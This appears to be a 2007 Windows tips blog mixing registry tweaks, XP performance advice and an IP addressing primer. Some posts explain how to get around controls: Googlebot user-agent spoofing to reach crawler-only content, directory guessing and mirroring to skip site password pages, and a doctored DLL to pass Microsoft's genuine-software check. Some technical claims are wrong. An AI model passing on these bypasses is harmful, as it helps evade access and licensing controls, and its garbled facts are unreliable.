"NtfsDisableLastAccessUpdate"=dword:00000001
Clear 'Recent Documents' on Log off
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
Display Drive Letters first in 'My Computer'
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"ShowDriveLettersFirst"=dword:00000004
Change Drive Icon (You have to change the \C\ below to the drive you want to change)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\C\DefaultIcon]
""="c:\somefolder\icon.ico"
Don't Group Similar Taskbar Buttons
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarGlomming"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarGlomming"=dword:00000000
Launch Windows Desktop in a Separate Process (Internet Explorer and Windows Explorer don't crash together)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"DesktopProcess"=dword:00000001
Disable Recent Documents History
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsHistory"=dword:00000001
Disable Tracking of Broken Shortcut Links
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoResolveTrack"=dword:00000001
Prevents Internet Explorer windows from being reused
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"AllowWindowReuse"=dword:00000000
Show Detailed Information in Device Manager (can display old/removed hardware drivers)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
"DEVMGR_SHOW_DETAILS"=dword:00000001
"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"
Remove More Themes Online... from Themes Dropdown Box
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\DownloadSites]
Remove Language Bar from Taskbar
[-HKEY_CLASSES_ROOT\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}]
@="Language bar"
"MenuTextPUI"="@%SystemRoot%\\System32\\msutb.dll,-325"
Tips and tricks for Windows Registry !!
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"AutoChkTimeOut"=dword:00000003
Disable Automatic Restart in the event of a System Crash / BSOD
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"AutoReboot"=dword:00000000
Disable The Windows XP Desktop Cleanup Wizard (Unused Desktop Shortcuts)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz]
"NoRun"=dword:00000001
Speed up Network Browsing by Removing Network Scheduled Tasks
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
Disables Windows Take A Tour Bubble Popup
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\Tour]
"RunCount"=dword:00000000
Disable Remote Registry Service (Remote users to modify registry settings on your computer. Now registry can be modified only by users on your computer)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Start"=dword:00000004
Removes the Recent Documents from the Start menu. The system saves a shortcut to each of the non-program files the user opened most recently, and it displays the shortcuts on the Recent Documents.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsMenu"=dword:00000001
Classic Search, Full Path In Title Bar And Address Bar. This allows you to disable the new Search Assistant Dog and use the traditional search interface in Windows Explorer
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]
"FullPath"=dword:00000000
"FullPathAddress"=dword:00000001
"Use Search Asst"="no"
"Settings"=hex:0c,00,02,00,1b,01,e7,77,60,00,00,00
Low Disk Space Notification ? This Disables Low Diskspace Warnings
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiskSpaceChecks"=dword:00000001
Do you want to Speedup the Windows XP Start Menu?
[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"="2"
Maximize Your Internet Explorer's Simultaneous Downloads From 2 to 10 Connections
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server"=dword:0000000a
"MaxConnectionsPerServer"=dword:0000000a
Remove the Queue-it-up, Burn to CD right click options on Windows Media Player files.
[-HKEY_CLASSES_ROOT\CLSID\{CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C}]
[-HKEY_CLASSES_ROOT\CLSID\{F1B9284F-E9DC-4e68-9D7E-42362A59F0FD}]
[-HKEY_CLASSES_ROOT\CLSID\{8DD448E6-C188-4aed-AF92-44956194EB1F}]
Removes Sign up with Passport Wizard when trying to sign in MSN Messenger First time
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Passport]
"RegistrationCompleted"=dword:00000001
Disables Preview (Thumbnails) of Movie File Formats (Allowing You To Move/Rename/Delete without Errors)
[-HKEY_CLASSES_ROOT\.avi\ShellEx]
[-HKEY_CLASSES_ROOT\.mpg\ShellEx]
[-HKEY_CLASSES_ROOT\.mpe\ShellEx]
[-HKEY_CLASSES_ROOT\.mpeg\ShellEx]
[-HKEY_CLASSES_ROOT\.mov\ShellEx]
Open Explorer From My Computer or Any Folder (Power users love this)
[HKEY_CLASSES_ROOT\Folder\shell]
@="explore"
Remove 'Shortcut To ...' Prefix when you create new Shortcut
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"link"=hex:00,00,00,00
This adds 'Command Prompt here' on Right Click Menu (When you right click on a Drive/Folder)
[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here]
@="Command &Prompt Here"
[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here\command]
@="cmd.exe /k cd %1 "
[HKEY_CLASSES_ROOT\Drive\shell\Command Prompt Here]
@="Command &Prompt Here"
[HKEY_CLASSES_ROOT\Drive\shell\Command Prompt Here\command]
@="cmd.exe /k cd %1 "
Remove Shared Documents folders from My Computer System Folder
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]
Disable the Unread Mail Message on the Welcome Screen
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail\]
"MessageExpiryDays"=dword:00000000
Disable Compress Old Files (This is useful when Disk Cleanup Tool Stops Responding While Compressing Old Files)
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Compress old files]
Windows Explorer Crashes When Opening Folder Containing avi/video files
[-HKEY_CLASSES_ROOT\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}]
[-HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32]
Disabling the File Association Web Service (when you click on unknon file it displays 'Windows can not open this file, ... Use the web service to find the appropriate program / Select from the Program list')
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
Friday, November 23, 2007
Secret Backdoor !!
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
You're done!
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Introduction of IP Addresses !!
Every system connected to the Internet or connected to a particular network has a unique Internet Protocol Address of an IP Address. Just as in the real world every person has his or her own Home Contact Address, similarly every system connected to the Internet has its own unique IP Address. Your IP Address is the address to which data should be sent to ensure that it reaches your system. The IP Address of a system acts as the system’s unique identity on the net.
Structure of an IP Address:
An Internet Address (IP Address) is a 32-bit address or number, which is normally written as four decimal numbers (of 8 bits each), each separated from the other by a decimal. This standard is known as the dotted-decimal notation.
For Example,
A Typical IP Address would be as follows: 192.168.1.1
It can be further broken down as:
192 representing the first 8-bits.
168 representing the next 8-bits.
1 representing the third 8-bits.
1 representing the fourth 8-bits.
Thus when considered together 192.168.1.1 represents 32-bits. So basically we can conclude that each decimal in an IP Address represents 1 byte or 8 bits. It is important to note than an IP Address can contain numbers from 0-255.
There are a huge number of IP Addresses in use in the present day wired age. All these IP Addresses have some sort of relation with each other and each individual IP Address can reveal a lot of secrets about the Network, of which it is a part. Before we move on to that, we need to understand the fact that all IP Addresses being used are divided into a number of ranges, which are as follows:
Class Range
A 0.0.0.0 to 127.255.255.255
B 128.0.0.0 to 191.255.255.255
C 192.0.0.0 to 223.255.255.255
D 224.0.0.0 to 239.255.255.255
E 240.0.0.0 to 247.255.255.255
We can easily conclude that one can find out the Class to which an IP Address belongs to simply by comparing the numeral before the first decimal of the IP Address with the above table.
For Example,
In The IP Address 192.168.1.1, the number before the first decimal is 192 and the above table tells us that it belongs to Class C of the range of IP addresses.
The various IP Addresses are divided into the different classes on the basis of the structure of their Network or in other words on the basis of what the various numbers separated by decimals actually stand for. To understand this, let us refer to the following:
Class Information
A It has the first 8-Bits for Netid and the last 24-bits for Hostid
B It has the first 16-Bits for Netid and the last 16-bits for Hostid
C It has the first 24-Bits for Netid and the last 8-bits for Hostid
D It represents a 32-bit multicast Group ID.
E Currently not being used.
The above table will be clearer after reading the following examples:
Examples:
An IP Address 192.168.1.1 belonging to Class A means that the network ID is 192 and the host ID is 168.1.1
If the Same IP Address belonged to Class B, then the network ID would become 192.168 and the host ID would become 1.1
And if it belonged to Class C then the network ID would become 192.168.1 and the host ID would become 1.
Almost all ISP’s prefer to use a Class B Network. If that is the case then each time you login to your ISP, then the first 2 octets of your IP Address would not change, while the last two are likely to change. However, even if only the last octet changes, and the remaining three remain constant, it is likely that the ISP uses Class B addressing.
How do you find out the IP Address of your own system?
In order to get your own IP Address all you have do is, follow the below process:
1. Connect to the Internet.
2. Launch MSDOS.
3. Type: netstat –n at the prompt.
You will get an output similar to the below:
C:\WINDOWS>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 192.168.1.1:1025 64.4.13.56:1863 ESTABLISHED
TCP 192.168.1.1:1031 209.143.242.119:80 ESTABLISHED
The IP Address shown under the Local Address Field denotes the IP address of your system.
An IP Address, which belongs to the Class-A addressing system having a network ID equal to 127, is referred to as the special address. It is actually known as the Loopback Interface. It allows clients and servers on the same system to communicate with each other.
The loopback address, which is commonly used, is 127.0.0.1. Almost all systems have also given the loopback address the special name ‘localhost’.
Hide your IP using Proxy Server !!
2. Type the website address there after selecting the language.
3. Then press Enter.
4. You are now viewing the website anonymously.
5. The Website Administrator does not know your IP Address. He sees a IP Address from some part of the world.
How to Defeat Java Script Protected Sites !!
Try typing target_com/images .(almost every web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory.
ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.
We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url target_index you will be onthe index page and ready to follow the links for downloading.
Danger of ''ctrl+c'' in web !!
1) Copy any text by 'ctrl+c'
2) Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp
You will see the text you copied on the Screen which was accessed by this web page. (Check it out !!)
Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.
Be cautious ...
To avoid Clipboard Hack Problem, do the following:
1. In Internet Explorer, Go to Tools -> Internet options -> Security
2. Press Custom level.
3. In the security settings, select disable under Allow paste operations via script and click on 'OK. (Now the contents of your clipboard are safe.)
Tuesday, November 20, 2007
Remove Windows Messenger From XP !!
@echo off
RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove
@echo REGEDIT4>%TMP%\RemoveMsgr.reg
@echo.>>%TMP%\RemoveMsgr.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express]>>%TMP%\RemoveMsgr.reg
@echo "Hide Messenger"=dword:00000002>>%TMP%\RemoveMsgr.reg
@echo.>>%TMP%\RemoveMsgr.reg
regedit /s %TMP%\RemoveMsgr.reg
• Close all Internet Explorer windows.
• Run RemoveMsgr.bat, When prompted, click Yes to close all affected applications.
• Restart your computer for the changes to take effect.
You are done ..
Speed Up Win XP !!
1. To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.
2. If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.
3. Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.
4. Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.
The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.
Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature,
Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.
5. Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS.
6. Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.
7. In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.
8. Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.
9. Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it.
10. Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts.
11. Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.
12. Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.
13. If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.
14. Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.
15. Update anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.
16. Make sure you fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.
17. Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.
18. Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.
19. If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.
20. Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.
21. If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.
22. At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks.
Some Registry Tricks !!
You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.
Customize the System Tray
You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you cannot do this if you are using any of our software during the trial period; it will corrupt the trial license.
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify. Enter anything you like up to 8 characters.
If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM.
LockOut Unwanted Users
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode
Disable the Outlook Express Splash Screen
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\OutLook Express
3. Add a string value "NoSplash"
4. Set the value data to 1 as a Dword value
Multiple Columns For the Start Menu
1. Open RegEdit
2. Go to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced
3. Create a string value "StartMenuScrollPrograms"
4. Right click the new string value and select modify
5. Set the value to "FALSE"
Changing Windows' Icons
You can change the Icons Windows uses for folders, the Start Menu, opened and closed folder in the Explorer, and many more.
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Shell Icons
3. Add a string value for each Icon you wish to change.
Example: "3" ="C:\Windows\Icons\MyIcon.ico,0" This will change the closed folders in the Explorer to "MyIcon.ico". Here is a complete list for each value.
0= Unknown file type
1= MSN file types
2= Applications Generic
3= Closed Folder
4= Open Folder
5= 5.25" Drive
6= 3.25" Drive
7= Removable Drive
8= Hard Drive
9= NetWork Drive
10= Network Drive Offline
11= CD-ROM Drive
12= RAM Drive
13= Entire Network 14= Network Hub
15= My Computer
16= Printer
17= Network Neighborhood
18= Network Workgroup
19= Start Menu's Program Folders
20= Start Menu's Documents
21= Start Menu's Setting
22= Start Menu's Find
23= Start Menu's Help
24= Start Menu's Run
25= Start Menu's Suspend
26= Start Menu's PC Undock
27= Start Menu's Shutdown 28= Shared
29= Shortcut Arrow
30= (Unknown Overlay)
31= Recycle Bin Empty
32= Recycle Bin Full
33= Dial-up Network
34= DeskTop
35= Control Panel
36= Start Menu's Programs
37= Printer Folder
38= Fonts Folder
39= Taskbar Icon
40= Audio CD
Now Restart your Computer..
Monday, November 19, 2007
Stop the automatically rebooting after Windows Updates !!
Open your registry and find or create the key below.
Go here [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
Create a new DWORD value, or modify the existing value, called "NoAutoRebootWithLoggedOnUsers" and set it (0 = no effect, 1 = do not automatically reboot)
Exit your registry; you may need to restart or log out of Windows for the change to take effect.
and you are done .!!
Make your Desktop Icons Transparent !!
Remove Stored username and Passwords !!
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords
Custom Folder to My Computer or the Desktop !!
Create the following series of keys and values in the registry at [HKEY_CLASSES_ROOT\CLSID] or [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID]. The GUID, globally unique identifier, can be a random number, in this example "FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345" is used.
Create a new key called [HKEY_CLASSES_ROOT\CLSID\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}] and set (Default) to equal the name of the folder e.g. "My Folder".
Create a new sub-key under the main key called "DefaultIcon" (i.e. [HKEY_CLASSES...ABCD1DE12345}\DefaultIcon]) and set (Default) to equal the filename for the icon you want to display e.g. "c:\windows\myicon.ico".
Create a new sub-key under the main key called "InProcServer32" (i.e. [HKEY_CLASSES...ABCD1DE12345}\InProcServer32]) and set (Default) to equal "shell32.dll", also create a new String value called "ThreadingModel" and set it to "Apartment".
Create a set of sub-keys starting at the main key "Shell\Open My Menu\Command" (i.e. [HKEY_CLASSES...ABCD1DE12345}\Shell\Open My Folder\Command]) and set (Default) to equal the command to execute when clicked, in this case explorer, e.g. "explorer /root,c:\MyFolder".
Create a set of sub-keys starting at the main key "ShellEx\PropertySheetHandlers\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}" (i.e. [HKEY_CLASSES...ABCD1DE12345}\ShellEx\PropertySheetHandlers\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}])
Create a new sub-key under the main key called "ShellFolder" (i.e. [HKEY_CLASSES...ABCD1DE12345}\ShellFolder]) and create a new Binary value called "Attributes" and set it to "00 00 00 00".
(Optional) To place the folder on the desktop add the following key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Desktop\NameSpace\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}]
(Optional) To place the folder in My Computer add the following key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\MyComputer\NameSpace\{FD4DF9E0-E3DE-11CE-BFCF-ABCD1DE12345}]
Now the folder cannot be deleted from the desktop or My Computer, nor can it be renamed other than removing the CLSID and the entries under NAMESPACE.
Play Music in G talk !!
Unplug your microphone. Double click on the speaker icon in the lower right corner. This will open up "Volume Control". Select "Options" and then "Properties". Then check the button next to "Recording" then click OK. You may also have to change your setting under Mixer Device. Now the Recording Control screen should be up. On my computer I selected "Wave Out Mix". Click on the green phone in Google Talk and call your friend.
Install Windows Media player 11 !!
trick 4 Media Player 11 installation and the Internet Explorer 7 installation.
you can download this registry file, executed it and start the windows media player 11 for xp installation and it should go through passing the WGA check without problems. Suspicious users should check the registry file before they double-click it and make a backup of their registry.
Alternative
After you download that Windows Media Player 11 from Microsoft website, use any compression utility, such as Winrar, to extract the WMP11 installer to a temporary directory. You can right click on the setup file and choose any Extract option or launch the extraction utility and choose the WMP11 setup file to extract it.
Then download LegitLibM.dll.rar note rename the file to LegitLibM.dll as microsoft edited it and extract it. Copy that extracted legitlib.dll and paste legitlib.dll into the extracted directory of WMP11 installer. Overwrite any existing file.
Run setup_wm.exe. and done. You can install Windows Media Player wmp 11 Beta accordingly.
remove shared documents folder !!
Once in registry, navigate to key
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee} . If you delete this key, you have effectively removed the my shared documents folder.
Unlock Toolbars !!
• Right-click on a toolbar, and then click Lock the Toolbars to remove the check mark.
• Right-click on the toolbar again, and then click Customize.
You may add or remove toolbar buttons, change text options and icon options. When you've got the toolbar customized, click Close. Now right-click on the toolbar and then click Lock the Toolbars to lock them in place. com
700 mb picture taken by Hubble Space Telescope!!
A spiral-shaped system of stars, dust, and gas clouds, the galaxy's arms wind all the way down into the nucleus. Though the galaxy is located 11.6 million light-years away, the Hubble Space Telescope's view is so sharp that it can resolve individual stars, along with open star clusters, globular star clusters, and even glowing regions of fluorescent gas. The Hubble data was taken with the Advanced Camera for Surveys in 2004 through 2006. This colour composite was assembled from images taken in blue, visible, and infrared light.
Full Size Image
Warning! Massive file! 22620x15200p (706mb!)
Click here to download
Smaller picture for people without hightech performance machines:
Reduced Size
4000x2688p (6,2mb)
Click here to downlaod
The No1 Paying Money Site In India !!
Lots of People among them just want to sit beside the Pc and earn money .. In USA , Canada , Uk , and like all the Other Countries .. So here comes an oppurtunity for us to earn like they earn just sitting at home and Money Cosmos Helps us in Doing that , its simple just like 1 . 2 . 3 .
How will you earn Money?
In simple words, this is your once in a lifetime opportunity to earn money online. They will pay you up to $1.00 USD, Rs. 45.00 INR for each user who registers for FREE with our Advertiser. Plus, they also pay you a whopping 20% extra for transactions generated by members refered by you!
Why Money Cosmos?
Money Cosmos is a venture of Karmath Infotech Private Limited ®
There are several plus points about Money Cosmos, which differ us from other affiliate websites.
• Registration is 100% Free! No Hidden Cost
• You don't need to earn Rs.2,000 or 5,000 to get paid Our Minimum Payout is Just Rs.500
• You don't need to wait for 90 or even 60 days for payments. We pay monthly.
• We don't just say that we pay, we are the only website that proved that we really pay.
What are you waiting for? Click here to Join Money Cosmos
Sunday, November 18, 2007
Recover the lost administrators password !!
2. Then (in safe mode) click Start and then click Run. In the open box type "control userpasswords2" without the quotes
3. You will now have access to all the user accounts, including the administrators account and will be able to reset the lost password.
4. Just click the administrators user account, and then click Reset Password.
5. You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking ok.
and you are done ..
Turn-off right mouse click on your desktop !!
2. In Run window type regedit
3. Go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
and
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
4. In bouth of them find next item NoViewContextMenu and give her a Value 0 to turn-off right mouse click or 1 to turn-on, if this Value don't exist create new DWORD with same Values,
Optimize your Hard-Disk !!
2. When you opened this file under [boot] section change "shell=explorer.exe" into "shell=defrag.exe",
3. Restart you computer,
4. When Windows is loaded, only Disk Defragmenter will run,
5. Optimize HD and restart your computer again,
6. Before windows start to loading press F8 on your keyboard,
7. Choose "Command Prompt Only" and type "edit system.ini" (without quotation marks) and under [boot] section change "shell=defrag.exe" into "shell=explorer.exe"
8. Restart you computer once again,
9. Now your HD is perfectly optimize.
Two Windows on the Screen Simulataneously !!
2. Open an another application and hold CTRL
3. Click the application window you want it to title with
4. Choose the desired Style
Set Volume Level for each Application !!
Open the application window and highlight to set it as active
Right click the speaker sound icon in taskbar
Click “Open Volume Meter”
Use the “Applications” Volume bar to change the volume of active application window
Multiple Clock Time Zones !!
Right click time icon in taskbar
Select Adjust Date/Time
Select “Additional Clock” Tab
Check the box and set your desired date/time
The time zones will be shown in tooltips
An introduction to hacking !!
--------------------------
